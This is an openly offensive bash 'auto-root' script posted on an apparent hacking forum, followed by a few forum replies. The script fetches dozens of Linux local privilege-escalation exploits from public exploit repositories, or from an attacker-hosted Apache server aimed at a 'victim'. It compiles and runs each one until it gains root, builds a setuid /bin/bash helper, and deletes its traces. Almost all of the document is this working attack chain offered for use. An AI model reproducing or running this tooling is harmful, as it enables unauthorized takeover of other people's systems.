    sudo wget --no-check-certificate $gitaddress/poc.c
    sudo wget --no-check-certificate $gitaddress/poc.py
}

function valid_ip()
{
    if ! [ "$2" ]; then
        echo -e "${red}${bold}IP Not Provided, Please provide an IP"
    else
        if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

            for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
            do
              (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
            done
        else
            echo -e "${light_green}========================================"
            echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
            echo -e "========================================"
            exit 1;
        fi
    fi
}

#gaddress=$1'/exploits'
#saddress=$1'/exploits'
#gitaddress=$1'/exploits/gitex'
function exploiter(){

    checkroot() {
        if [ $(id -u) == 0 ]; then
        echo
        echo -e "${light_red}Successfully R00T(ed).. have fun :)"
        id=$(id)
        echo -e "${light_red}ID     => ${light_green}" $id
        who=$(whoami)
        echo -e "${light_red}WHOAMI => ${light_green}" $who
        exit
        else
        echo ""
        echo -e "${light_red}R00Ting.. ${light_green}"
        sleep 1
        fi
    }
    ccmpl(){
        gcc exploit.c -o exploit -lutil -lpthread
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -m32 -O2 -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -O2 -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -lkeyutils -Wall
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -lpthread
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -pthread
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -static -Wall
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -Wall
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -fPIC -shared -o exploit exploit.c -ldl -w
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -O2 exploit.c
        gcc -O2 -fomit-frame-pointer exploit.c -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -o exploit exploit.c
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -o exploit exploit.c -static -O2
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -pthread exploit.c -o exploit -lcrypt
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -Wall -m64 -o exploit exploit.c
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -Wall -o exploit exploit.c
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
    }
    shcmpl(){
        bash exploit.sh
        rm exploit.sh
        rm *.c
        checkroot;
    }
    pycmpl(){
        python exploit.py
        rm exploit.py
        rm *.c
        checkroot;
    }
    echo -e "${light_red}Auto R00Ting started...${light_green}"

    checkroot;
    #c
    wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
    ccmpl;

    #sh
    wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
    shcmpl;
    wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
    shcmpl;
    wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
    shcmpl;

    #py
    wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
    pycmpl;
    wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
    pycmpl;

    #txt
    #platforms/linux/local/9191.txt
    wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    tar -zxf 9191.tgz
    cd cheddar_bay
    bash cheddar_bay.sh
    cc -fno-stack-protector -o exploit exploit.c
    ./exploit
    cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
    ./exploit
    cd ..
    rm -rf cheddar_bay
    rm -rf 9191.tgz
    tar -zxf 33395.tgz
    cd ext4_own
    bash ext4_own.sh
    cd ..
    rm -rf ext4_own
    rm -rf 33395.tgz
    checkroot;
    #platforms/linux/local/39772.txt
    wget --no-check-certificate $saddress/bin-sploits/39772.zip
    cd 39772
    unzip 39772.zip
    tar -xf exploit.tar
    cd ebpf_mapfd_doubleput_exploit
    bash compile.sh
    ./hello
    ./doubleput
    ./suidhelper
    cd ..
    rm -rf ebpf_mapfd_doubleput_exploit
    rm -rf exploit.tar
    checkroot;
    tar -xf crasher.tar
    cd ebpf_mapfd_doubleput_crasher
    bash compile.sh
    ./doubleput
    cd ..
    rm -rf ebpf_mapfd_doubleput_crasher
    rm -rf 39772
    rm -rf 39772.zip
    checkroot;
    #platforms/linux/local/23674.txt
    smbmount --version
    ls -l /usr/bin/smbmount
    ls -l /usr/bin/smbmnt
    echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
    make a
    cc a.c -o a
    chmod +s a
    share:/etc/samba/smb.conf
    /etc/samba/smb.conf
    [share]
    path = /data/share
    writable = no
    locking = no
    public = yes
    guest ok = yes
    comment = Share
    ls -l a
    ls -l pokus/a
    id
    checkroot;
    #platforms/linux/local/29714.txt
    wget --no-check-certificate $saddress/bin-sploits/29714.tgz
    tar -zxf 29714.tgz
    cd exploit
    make
    make install
    cd ..
    rm -rf exploit
    rm -rf 29714.tgz
    checkroot;
    wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    tar -zxf 9191.tgz
    cd cheddar_bay
    bash cheddar_bay.sh
    cc -fno-stack-protector -o exploit exploit.c
    ./exploit
    cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
    ./exploit
    cd ..
    rm -rf cheddar_bay
    rm -rf 9191.tgz
    tar -zxf 33395.tgz
    cd ext4_own
    bash ext4_own.sh
    cd ..
    rm -rf ext4_own
    rm -rf 33395.tgz
    checkroot;
    #platforms/linux/local/33395.txt
    wget $saddress/bin-sploits/33395.tgz
    tar -zxf 33395.tgz
    cd ext4_own
    bash ext4_own.sh
    checkroot;
    cd ..
    rm -rf ext4_own
    rm -rf 33395.tgz
    #platforms/linux/local/40489.txt
    wget --no-check-certificate $saddress/bin-sploits/40489.zip
    unzip 40489.zip
    cd 40489
    bash compile.sh
    ./pwn
    ./enjoy
    cd ..
    rm -rf 40489
    rm -rf 40489.zip
    checkroot;
    #platforms/linux/local/41770.txt
    # #!/bin/bash
    # (./ProcReadHelper /proc/$$/syscall) &
    # sleep 1
    # exec /usr/bin/passwd
    # #!/bin/bash
    # echo "Current pid is $$"
    # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
    # sleep 5
    # exec /usr/bin/passwd
    # static ssize_t mem_read(struct file * file, char __user * buf,
    #                         size_t count, loff_t *ppos) {
    #     if (file->private_data != (void*)((long)current->self_exec_id))
    #         goto out_put;
    # #!/bin/bash
    # (sleep 3; echo 15) > /proc/$$/oom_adj &
    # exec /usr/bin/passwd
    # checkroot;
    #platforms/linux/local/38559.txt
    rmmod b43
    modprobe b43 fwpostfix=AA%xBB
    dmesg
    checkroot;
    #platforms/linux/local/41999.txt
    wget --no-check-certificate $gitaddress/poc.c -O poc.c
    gcc poc.c -masm=intel
    ./a.out 0
    checkroot;
    ./a.out 1
    checkroot;
    ./a.out 2
    checkroot;
    ./a.out 3
    checkroot;
    ./a.out 4
    checkroot;
    ./a.out 5
    checkroot;
    ./a.out 6
    checkroot;
    ./a.out 7
    checkroot;
    ./a.out 8
    checkroot;
    ./a.out 9
    checkroot;
    ./a.out 10
    checkroot;
    rm a.out
    rm poc.c
    wget --no-check-certificate $gitaddress/poc.py -O poc.py
    python poc.py
    checkroot;
    rm poc.py
    rm a.out
    rm exploit
    
    echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
    exit 1;
}

if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
    lauto_root
    desc
fi

if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
    lauto_root
    sleep 2 
    echo -e "\n${light_green}=================================="
    echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
    echo -e "==================================\n"
    # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
    gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
    # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
    saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
    local_dir
    arsenal
    echo -e "${light_green}=========================="
    echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
    echo -e "==========================\n"
    echo -e "${light_green}=========================="
    echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
    echo -e "==========================\n"
    /bin/bash -i /etc/init.d/apache2 start
    /bin/bash -i /etc/init.d/apache2 status
    echo -e "${light_green}=================================="
    echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
    echo -e "==================================\n"

    exit 1;
fi 

if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
    lauto_root
    if ! [ "$2" ]; then
        echo -e "\n${light_red}No IP address provided!!!\n"
        exit 1;
    else     
        ip=$2
    fi

    if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

        for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
        do
          (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
        done
    else
        echo -e "${light_green}========================================"
        echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
        echo -e "========================================\n"
    fi    

    sleep 2 
    echo -e "${light_green}=================================="
    echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
    echo -e "==================================\n"
    gaddress='http://'${ip}'/exploits'
    saddress='http://'${ip}'/exploits'
    gitaddress='http://'${ip}'/exploits/gitex'
    exploiter
    exit 1;
fi

if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
    lauto_root
    gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
    saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
    sleep 2 
    echo -e "${light_green}==================================="
    echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
    echo -e "===================================\n"
    exploiter
    exit 1;
fi
thanks for share
Click to expand...
D4rkn3SExcellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

Ive got some "HQ" stuff to show you.

 
Last edited by a moderator:
bash818 said:
Its a jabber..
Click to expand...
bash818@bash818 You can not put emails in the forum, or jabbers or anything similar. If you want to contact him use the private message.
You should know the rules. :close_tema:

 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top